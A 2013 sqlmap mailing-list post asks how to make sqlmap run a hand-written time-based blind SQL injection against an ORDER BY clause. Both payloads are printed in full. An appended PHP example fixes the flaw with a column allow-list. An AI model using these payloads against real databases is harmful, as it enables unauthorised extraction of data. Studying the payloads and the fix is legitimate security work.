[sqlmap-users] exp blind
From: Кирилл Б. <li...@gm...> - 2013-02-21 16:22:30
Hello, all.

I'm trying to exploit the blind injection in the following query:

$var = $_GET['var'];
SELECT id,name FROM people ORDER BY $var

sqlmap finds the vulnerability, but cannot exploit it. sqlmap sends the following query:

name AND 561/*!50000=*/IF((ORD(MID((/*!50000SELECT*/ IF(ISNULL(/*!50000CAST*/(/*!50000COUNT*/(DISTINCT(schema_name)) AS CHAR)),CHAR(32),/*!50000CAST*/(/*!50000COUNT*/(DISTINCT(schema_name)) AS CHAR)) FROM /*!50000information_schema*/.SCHEMATA),1,1)) NOT BETWEEN 0 AND 1),SLEEP(5),561)

[22:20:36] [ERROR] unable to retrieve the number of databases

but it does not work. Some kind of filter may be interfering.

But my request in the browser URL:

index.php?var=CASE WHEN (SELECT ASCII(SUBSTRING(schema_name, 1, 1)) FROM /*!50000information_schema*/.SCHEMATA limit 0,1) NOT BETWEEN 0 AND 65 THEN sleep(10) ELSE date END

It runs successfully ...

How can I get sqlmap to use my method of attack instead of the one it uses by default?

Sincerely,
Kirill

P.S. Sorry for my bad English.
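For anyone fixing code like the quoted query: bound parameters cannot stand in for a column name in ORDER BY, so the usual remedy is to map the request value onto a fixed set of column names. The following is an added example, not part of the original post; the function name, the allow-list, the sample rows and the use of an in-memory SQLite database through PDO are assumptions made for illustration.

```php
<?php
// Added example (not from the original post). Table and column names follow
// the query quoted in the post; everything else is assumed for illustration.

// Accepted request values mapped to fixed SQL fragments. The request value is
// only ever used as an array key, never concatenated into the statement.
const SORT_COLUMNS = ['id' => 'id', 'name' => 'name'];

function listPeople(PDO $db, ?string $sort, ?string $dir = null): array
{
    // Unknown or missing values fall back to a default instead of reaching SQL.
    $column = SORT_COLUMNS[$sort ?? ''] ?? 'id';
    $direction = strtoupper($dir ?? '') === 'DESC' ? 'DESC' : 'ASC';

    // Both interpolated pieces come from constants in this file.
    $sql = "SELECT id, name FROM people ORDER BY $column $direction";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed sample data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE people (id INTEGER PRIMARY KEY, name TEXT)');
$db->exec("INSERT INTO people (name) VALUES ('carol'), ('alice'), ('bob')");

// A legitimate sort key is honoured.
print_r(array_column(listPeople($db, 'name'), 'name'));

// An expression in place of a column name is not a key in the map, so the
// default ordering by id is used and no request text reaches the database.
print_r(array_column(listPeople($db, 'CASE WHEN 1=1 THEN name ELSE id END'), 'name'));
```

In the application from the post, the call would receive `$_GET['var']` as the `$sort` argument.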